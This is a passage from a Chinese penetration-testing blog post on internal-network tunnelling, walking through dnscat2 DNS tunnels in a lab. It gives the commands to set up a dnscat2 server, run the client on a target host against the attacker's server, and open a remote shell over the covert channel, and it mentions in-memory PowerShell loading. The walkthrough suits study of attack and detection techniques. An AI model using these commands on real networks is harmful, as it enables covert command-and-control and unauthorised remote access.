<p>将域名指向域名服务器地址，如果需要设置邮箱，让邮箱能收到邮件，就需要添加MX记录。</p>
<h3 id="查看DNS连通性"><a href="#查看DNS连通性" class="headerlink" title="查看DNS连通性"></a>查看DNS连通性</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;etc&#x2F;resolv.conf</span><br><span class="line"></span><br><span class="line">nslookup baidu.com</span><br></pre></td></tr></table></figure>

<h3 id="dnscat2"><a href="#dnscat2" class="headerlink" title="dnscat2"></a>dnscat2</h3><p><a target="_blank" rel="noopener" href="https://github.com/iagox86/dnscat2">dnscat2</a> 是一款开源软件，使用 DNS 协议创建加密的 C&amp;C 通道，通过预共享密钥进行身份认证；使用 Shell 及 DNS 查询类型（TXT、MX、CNAME、A、AAAA），支持多个会话，在内存中直接执行 PowerShell 脚本。客户端采用 C 语言编写，服务端采用 Ruby 语言编写。</p>
<p>两种工作模式：</p>
<ul>
<li><strong>直连模式</strong>：客户端直接向指定 IP 地址的 DNS 服务器发起 DNS 解析请求。</li>
<li><strong>中继模式</strong>：DNS 经过互联网的迭代解析，指向指定的 DNS 服务器，速度较慢。</li>
</ul>
<p>如果目标内网放行所有 DNS 请求，则 dnscat2 会使用直连模式，通过 UDP 的 53 端口进行通信（不需要域名，速度快，而且看上去仍然像普通的 DNS 查询）。在请求日志中，所有的域名都是以 “dnscat” 开头，因此防火墙很容易地将直连模式的通信检测出来。</p>
<p>如果目标内网中的请求仅限于白名单服务器或者特定的域，dnscat2 会使用中继模式来申请一个域名，并将 dnscat2 服务端的服务器指定为受信任的 DNS 服务器。</p>
<h4 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h4><p>先在自己的服务器上安装dnscat2的server端</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br><span class="line">apt-get -y install ruby-dev git make g++</span><br><span class="line">gem install bundler</span><br><span class="line"></span><br><span class="line">git <span class="built_in">clone</span> https://github.com/iagox86/dnscat2.git</span><br><span class="line"><span class="built_in">cd</span> dnscat2/server</span><br><span class="line">bundle install</span><br></pre></td></tr></table></figure>

<p>然后启动服务端</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sudo systemctl stop systemd-resolved</span><br><span class="line"></span><br><span class="line"><span class="comment">#直连模式</span></span><br><span class="line">sudo ruby ./dnscat2.rb --dns host=0.0.0.0,port=5300,domain=gard3nia.com</span><br><span class="line"></span><br><span class="line"><span class="comment">#中继模式</span></span><br><span class="line">sudo ruby ./dnscat2.rb gard3nia -e open -c test123 --no-cache</span><br></pre></td></tr></table></figure>

<p>由于实验环境在局域网内无法请求外网的DNS服务器，所以我这里就直接采用直连模式了，server端自动帮我生成了secret值，在启动客户端准备上线的时候需要带上这个值才能成功建立隧道。</p>
<p><img src="https://s1.ax1x.com/2022/04/04/qqFtSK.png" alt="qqFtSK.png"></p>
<p>在目标主机上运行client端</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dnscat2.exe --dns server&#x3D;192.168.111.11,port&#x3D;5300 --secret&#x3D;xxxxxxxxxxxxxxx</span><br></pre></td></tr></table></figure>

<p>可以看到成功建立了session</p>
<p><img src="https://s1.ax1x.com/2022/04/04/qqVCpq.png" alt="qqVCpq.png"></p>
<p>回到服务端我们可以列出session并选择进入会话</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sessions</span><br><span class="line">session -i id</span><br></pre></td></tr></table></figure>

<p>也可以尝试ping命令，响应为pong则表示命令执行成功，主机成功上线</p>
<p><img src="https://s1.ax1x.com/2022/04/04/qq45QO.png" alt="qq45QO.png"></p>
<p>此时被控主机客户端的显示</p>
<p><img src="https://s1.ax1x.com/2022/04/04/qq4OYt.png" alt="qq4OYt.png"></p>
<p>windows命令查看目前控制进程，<code>window -i id </code>可进入会话，创建目标主机shell：</p>
<p><img src="https://s1.ax1x.com/2022/04/04/qqIJ5n.png" alt="qqIJ5n.png"></p>
<p>当然客户端也可以使用powershell内存加载进行上线，这里不再演示，常见的工具还有iodine，以后用到了再来写写吧。</p>
<h1 id="0x05传输层隧道技术"><a href="#0x05传输层隧道技术" class="headerlink" title="0x05传输层隧道技术"></a>0x05传输层隧道技术</h1><h1 id="0x06网络层隧道技术"><a href="#0x06网络层隧道技术" class="headerlink" title="0x06网络层隧道技术"></a>0x06网络层隧道技术</h1><h1 id="0x07参考链接"><a href="#0x07参考链接" class="headerlink" title="0x07参考链接"></a>0x07参考链接</h1><p>1.<a target="_blank" rel="noopener" href="https://chenguangwu.github.io/evernode/SSH%E7%9A%84%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%9C%AC%E5%9C%B0%E8%BD%AC%E5%8F%91Local%20Forward%E5%92%8C%E8%BF%9C%E7%A8%8B%E8%BD%AC%E5%8F%91Remote%20Forward%20.html">https://chenguangwu.github.io/evernode/SSH%E7%9A%84%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%9C%AC%E5%9C%B0%E8%BD%AC%E5%8F%91Local%20Forward%E5%92%8C%E8%BF%9C%E7%A8%8B%E8%BD%AC%E5%8F%91Remote%20Forward%20.html</a></p>
<p>2.<a target="_blank" rel="noopener" href="https://3nd.xyz/post/2020-05-25-AD-Pentest-Hidden-Tunnel/">https://3nd.xyz/post/2020-05-25-AD-Pentest-Hidden-Tunnel/</a></p>
<p>3.<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/148825449">https://zhuanlan.zhihu.com/p/148825449</a></p>
<p>4.<a target="_blank" rel="noopener" href="https://www.k0rz3n.com/2019/07/27/reGeorg%20%E5%B7%A5%E4%BD%9C%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90(%E4%BB%A5%20php%20%E4%B8%BA%E4%BE%8B)/">https://www.k0rz3n.com/2019/07/27/reGeorg%20%E5%B7%A5%E4%BD%9C%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90(%E4%BB%A5%20php%20%E4%B8%BA%E4%BE%8B)/</a></p>
<p>5.<a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000023639546">https://segmentfault.com/a/1190000023639546</a></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Gard3nia</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://gard3nia.top/2022/03/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/">https://gard3nia.top/2022/03/29/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83-%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://gard3nia.top" target="_blank">Gard3nia's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Windows/">Windows</a><a class="post-meta__tags" href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><a class="post-meta__tags" href="/tags/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/">端口转发</a></div><div class="post_share"><div class="social-share" data-image="https://s2.loli.net/2022/03/30/ATLoyIlWEsXgVc4.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="/img/wx.png" target="_blank"><img class="post-qr-code-img" src="/img/wx.png" alt="wechat"/></a><div class="post-qr-code-desc">wechat</div></li><li class="reward-item"><a href="/img/zfb.jpg" target="_blank"><img class="post-qr-code-img" src="/img/zfb.jpg" alt="alipay"/></a><div class="post-qr-code-desc">alipay</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="next-post pull-full"><a href="/2022/03/19/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E6%94%BE%E5%BC%83-%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><img class="next-cover" src="https://s2.loli.net/2022/03/30/aVGdUuktz74EHc2.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">内网渗透从入门到放弃--内网信息收集</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2022/03/12/内网渗透从入门到放弃--Windows本地与网络认证/" title="内网渗透从入门到放弃--Windows本地与网络认证&NTLM协议"><img class="cover" src="https://s3.bmp.ovh/imgs/2022/03/24422db3a8eb6421.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-12</div><div class="title">内网渗透从入门到放弃--Windows本地与网络认证&NTLM协议</div></div></a></div><div><a href="/2022/03/13/内网渗透从入门到放弃-Windows域认证/" title="内网渗透从入门到放弃--Windows域认证&Kerberos协议"><img class="cover" src="https://s3.bmp.ovh/imgs/2022/03/2b4b3d1a58f55162.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-13</div><div class="title">内网渗透从入门到放弃--Windows域认证&Kerberos协议</div></div></a></div><div><a href="/2022/03/19/内网渗透从入门到放弃-内网信息收集/" title="内网渗透从入门到放弃--内网信息收集"><img class="cover" src="https://s2.loli.net/2022/03/30/aVGdUuktz74EHc2.jpg"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-19</div><div class="title">内网渗透从入门到放弃--内网信息收集</div></div></a></div></div></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By Gard3nia</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></div></body></html>